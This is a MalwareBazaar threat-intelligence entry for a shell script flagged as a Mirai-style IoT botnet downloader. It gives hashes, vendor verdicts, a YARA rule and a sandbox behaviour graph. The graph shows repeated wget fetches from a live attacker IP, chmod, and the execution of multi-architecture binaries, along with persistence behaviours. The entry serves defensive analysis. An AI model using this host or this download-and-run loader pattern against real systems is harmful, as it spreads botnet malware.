MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33
SHA3-384 hash: 784d06cce94a10d63809e453459e50eb5d47c737b70a60963c5bb6c917fc663f9420a76b06a042ef1c2b648c49813910
SHA1 hash: f41e8087dbd284c7db187078a41b22547ced136c
MD5 hash: a9458197291766ee95d15d8678dde539
humanhash: hydrogen-ink-floor-ink
File name:cat.sh
Download: download sample
File size:1'985 bytes
First seen:2026-01-28 20:33:10 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 24:wbxDqkpMjpMiM/MGMIGZB4xj/RMRR0/xcL1/j/+Zy3ZMZZkhc1pzZcZ6u0RMZFZv:mMdMiM/MGMIVjXoT+Zy0Dlq
TLSH T1DC4113ECD095534FD0C48D30747A658C72CB999E67EEBE24E483687A50C89443FDB636
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh

Intelligence

File Origin
# of uploads :
1
# of downloads :
37
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
mirai
Link:
https://www.filescan.io/uploads/697a72924156786ccbdda714/reports/67f29366-1891-48f5-b210-ee5503342bd4/overview
Result
Gathering data
Verdict:
Malicious
File Type:
unix shell
Detections:
HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/a8fa1ca5-8cc8-4e9a-8b1c-d9b106392891
Behavior Graph:
Download SVG
%3 guuid=0fe508d6-1900-0000-8aba-4d6ba1080000 pid=2209 /usr/bin/sudo guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218 /tmp/sample.bin guuid=0fe508d6-1900-0000-8aba-4d6ba1080000 pid=2209->guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218 execve guuid=11384ada-1900-0000-8aba-4d6bab080000 pid=2219 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=11384ada-1900-0000-8aba-4d6bab080000 pid=2219 execve guuid=59c728eb-1900-0000-8aba-4d6bc3080000 pid=2243 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=59c728eb-1900-0000-8aba-4d6bc3080000 pid=2243 execve guuid=16cec4eb-1900-0000-8aba-4d6bc4080000 pid=2244 /home/sandbox/herios.x86_64 mprotect-exec guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=16cec4eb-1900-0000-8aba-4d6bc4080000 pid=2244 execve guuid=235a25f7-1900-0000-8aba-4d6bd7080000 pid=2263 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=235a25f7-1900-0000-8aba-4d6bd7080000 pid=2263 execve guuid=9a473409-1a00-0000-8aba-4d6be3080000 pid=2275 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=9a473409-1a00-0000-8aba-4d6be3080000 pid=2275 execve guuid=d5e19e09-1a00-0000-8aba-4d6be5080000 pid=2277 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=d5e19e09-1a00-0000-8aba-4d6be5080000 pid=2277 clone guuid=8fa8550a-1a00-0000-8aba-4d6be8080000 pid=2280 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=8fa8550a-1a00-0000-8aba-4d6be8080000 pid=2280 execve guuid=03801d19-1a00-0000-8aba-4d6b01090000 pid=2305 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=03801d19-1a00-0000-8aba-4d6b01090000 pid=2305 execve guuid=f2d85519-1a00-0000-8aba-4d6b03090000 pid=2307 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=f2d85519-1a00-0000-8aba-4d6b03090000 pid=2307 clone guuid=ae53d419-1a00-0000-8aba-4d6b07090000 pid=2311 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=ae53d419-1a00-0000-8aba-4d6b07090000 pid=2311 execve guuid=f6cb7d2c-1a00-0000-8aba-4d6b28090000 pid=2344 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=f6cb7d2c-1a00-0000-8aba-4d6b28090000 pid=2344 execve guuid=a346c12c-1a00-0000-8aba-4d6b29090000 pid=2345 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=a346c12c-1a00-0000-8aba-4d6b29090000 pid=2345 clone guuid=4096942d-1a00-0000-8aba-4d6b2d090000 pid=2349 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=4096942d-1a00-0000-8aba-4d6b2d090000 pid=2349 execve guuid=59ec613f-1a00-0000-8aba-4d6b4d090000 pid=2381 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=59ec613f-1a00-0000-8aba-4d6b4d090000 pid=2381 execve guuid=8fcad03f-1a00-0000-8aba-4d6b4e090000 pid=2382 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=8fcad03f-1a00-0000-8aba-4d6b4e090000 pid=2382 clone guuid=68357a40-1a00-0000-8aba-4d6b52090000 pid=2386 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=68357a40-1a00-0000-8aba-4d6b52090000 pid=2386 execve guuid=6366e24f-1a00-0000-8aba-4d6b72090000 pid=2418 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=6366e24f-1a00-0000-8aba-4d6b72090000 pid=2418 execve guuid=405f2250-1a00-0000-8aba-4d6b73090000 pid=2419 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=405f2250-1a00-0000-8aba-4d6b73090000 pid=2419 clone guuid=92b3a550-1a00-0000-8aba-4d6b75090000 pid=2421 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=92b3a550-1a00-0000-8aba-4d6b75090000 pid=2421 execve guuid=a251035c-1a00-0000-8aba-4d6b8c090000 pid=2444 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=a251035c-1a00-0000-8aba-4d6b8c090000 pid=2444 execve guuid=c02f405c-1a00-0000-8aba-4d6b8e090000 pid=2446 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=c02f405c-1a00-0000-8aba-4d6b8e090000 pid=2446 clone guuid=12ccc75c-1a00-0000-8aba-4d6b92090000 pid=2450 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=12ccc75c-1a00-0000-8aba-4d6b92090000 pid=2450 execve guuid=d0c45d6b-1a00-0000-8aba-4d6bb5090000 pid=2485 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=d0c45d6b-1a00-0000-8aba-4d6bb5090000 pid=2485 execve guuid=eb0fa06b-1a00-0000-8aba-4d6bb7090000 pid=2487 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=eb0fa06b-1a00-0000-8aba-4d6bb7090000 pid=2487 clone guuid=f42dc16c-1a00-0000-8aba-4d6bbc090000 pid=2492 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=f42dc16c-1a00-0000-8aba-4d6bbc090000 pid=2492 execve guuid=e04b847b-1a00-0000-8aba-4d6bdc090000 pid=2524 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=e04b847b-1a00-0000-8aba-4d6bdc090000 pid=2524 execve guuid=4f7efb7b-1a00-0000-8aba-4d6bde090000 pid=2526 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=4f7efb7b-1a00-0000-8aba-4d6bde090000 pid=2526 clone guuid=7cb6dc7c-1a00-0000-8aba-4d6be0090000 pid=2528 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=7cb6dc7c-1a00-0000-8aba-4d6be0090000 pid=2528 execve guuid=168c9d8b-1a00-0000-8aba-4d6b000a0000 pid=2560 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=168c9d8b-1a00-0000-8aba-4d6b000a0000 pid=2560 execve guuid=9f40df8b-1a00-0000-8aba-4d6b010a0000 pid=2561 /home/sandbox/herios.i486 guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=9f40df8b-1a00-0000-8aba-4d6b010a0000 pid=2561 execve guuid=38028690-1a00-0000-8aba-4d6b0f0a0000 pid=2575 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=38028690-1a00-0000-8aba-4d6b0f0a0000 pid=2575 execve guuid=c5cc51a1-1a00-0000-8aba-4d6b390a0000 pid=2617 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=c5cc51a1-1a00-0000-8aba-4d6b390a0000 pid=2617 execve guuid=5f8d91a1-1a00-0000-8aba-4d6b3a0a0000 pid=2618 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=5f8d91a1-1a00-0000-8aba-4d6b3a0a0000 pid=2618 clone guuid=4df525a2-1a00-0000-8aba-4d6b3e0a0000 pid=2622 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=4df525a2-1a00-0000-8aba-4d6b3e0a0000 pid=2622 execve guuid=ca82ebb0-1a00-0000-8aba-4d6b640a0000 pid=2660 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=ca82ebb0-1a00-0000-8aba-4d6b640a0000 pid=2660 execve guuid=83d534b1-1a00-0000-8aba-4d6b650a0000 pid=2661 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=83d534b1-1a00-0000-8aba-4d6b650a0000 pid=2661 clone guuid=680ebdb2-1a00-0000-8aba-4d6b690a0000 pid=2665 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=680ebdb2-1a00-0000-8aba-4d6b690a0000 pid=2665 execve guuid=9534c1c2-1a00-0000-8aba-4d6b940a0000 pid=2708 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=9534c1c2-1a00-0000-8aba-4d6b940a0000 pid=2708 execve guuid=e6d6ffc2-1a00-0000-8aba-4d6b960a0000 pid=2710 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=e6d6ffc2-1a00-0000-8aba-4d6b960a0000 pid=2710 clone guuid=84c18ac3-1a00-0000-8aba-4d6b9a0a0000 pid=2714 /usr/bin/wget net send-data write-file guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=84c18ac3-1a00-0000-8aba-4d6b9a0a0000 pid=2714 execve guuid=d0a51ed5-1a00-0000-8aba-4d6bcf0a0000 pid=2767 /usr/bin/chmod guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=d0a51ed5-1a00-0000-8aba-4d6bcf0a0000 pid=2767 execve guuid=092867d5-1a00-0000-8aba-4d6bd10a0000 pid=2769 /usr/bin/dash guuid=5b8cdfd9-1900-0000-8aba-4d6baa080000 pid=2218->guuid=092867d5-1a00-0000-8aba-4d6bd10a0000 pid=2769 clone 1c6a1100-2a54-54a0-b790-d214eba82fa3 84.54.37.191:80 guuid=11384ada-1900-0000-8aba-4d6bab080000 pid=2219->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B guuid=9a59abed-1900-0000-8aba-4d6bc8080000 pid=2248 /usr/bin/dash guuid=16cec4eb-1900-0000-8aba-4d6bc4080000 pid=2244->guuid=9a59abed-1900-0000-8aba-4d6bc8080000 pid=2248 execve guuid=178f8fee-1900-0000-8aba-4d6bc9080000 pid=2249 /usr/bin/pgrep guuid=9a59abed-1900-0000-8aba-4d6bc8080000 pid=2248->guuid=178f8fee-1900-0000-8aba-4d6bc9080000 pid=2249 execve guuid=235a25f7-1900-0000-8aba-4d6bd7080000 pid=2263->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 141B guuid=8fa8550a-1a00-0000-8aba-4d6be8080000 pid=2280->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 138B guuid=ae53d419-1a00-0000-8aba-4d6b07090000 pid=2311->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 138B guuid=4096942d-1a00-0000-8aba-4d6b2d090000 pid=2349->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B guuid=68357a40-1a00-0000-8aba-4d6b52090000 pid=2386->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 141B guuid=92b3a550-1a00-0000-8aba-4d6b75090000 pid=2421->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 139B guuid=12ccc75c-1a00-0000-8aba-4d6b92090000 pid=2450->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 137B guuid=f42dc16c-1a00-0000-8aba-4d6bbc090000 pid=2492->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 137B guuid=7cb6dc7c-1a00-0000-8aba-4d6be0090000 pid=2528->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 138B guuid=8c44ec8b-1a00-0000-8aba-4d6b030a0000 pid=2563 /usr/bin/dash guuid=9f40df8b-1a00-0000-8aba-4d6b010a0000 pid=2561->guuid=8c44ec8b-1a00-0000-8aba-4d6b030a0000 pid=2563 execve guuid=92e5158c-1a00-0000-8aba-4d6b040a0000 pid=2564 /usr/bin/pgrep guuid=8c44ec8b-1a00-0000-8aba-4d6b030a0000 pid=2563->guuid=92e5158c-1a00-0000-8aba-4d6b040a0000 pid=2564 execve guuid=38028690-1a00-0000-8aba-4d6b0f0a0000 pid=2575->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B guuid=4df525a2-1a00-0000-8aba-4d6b3e0a0000 pid=2622->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B guuid=680ebdb2-1a00-0000-8aba-4d6b690a0000 pid=2665->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B guuid=84c18ac3-1a00-0000-8aba-4d6b9a0a0000 pid=2714->1c6a1100-2a54-54a0-b790-d214eba82fa3 send: 140B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2026-01-28 20:33:31 UTC
File Type:
Text (Shell)
AV detection:
10 of 36 (27.78%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ao7z37xjvv6ipqdkeedpg2y3nouk4laiwhvtwcrilapz7kkbjyzq._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
antivm defense_evasion discovery execution linux persistence privilege_escalation upx
Link:
https://tria.ge/reports/260128-zb245abz2a/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
Reads CPU attributes
Changes its process name
UPX packed file
Attempts to change immutable files
Checks hardware identifiers (DMI)
Creates/modifies Cron job
Enumerates running processes
File and Directory Permissions Modification
Deletes itself
Executes dropped EXE
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.12
Link:
https://yomi.yoroi.company/submissions/03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3765260/
  
Delivery method
Distributed via web download

Comments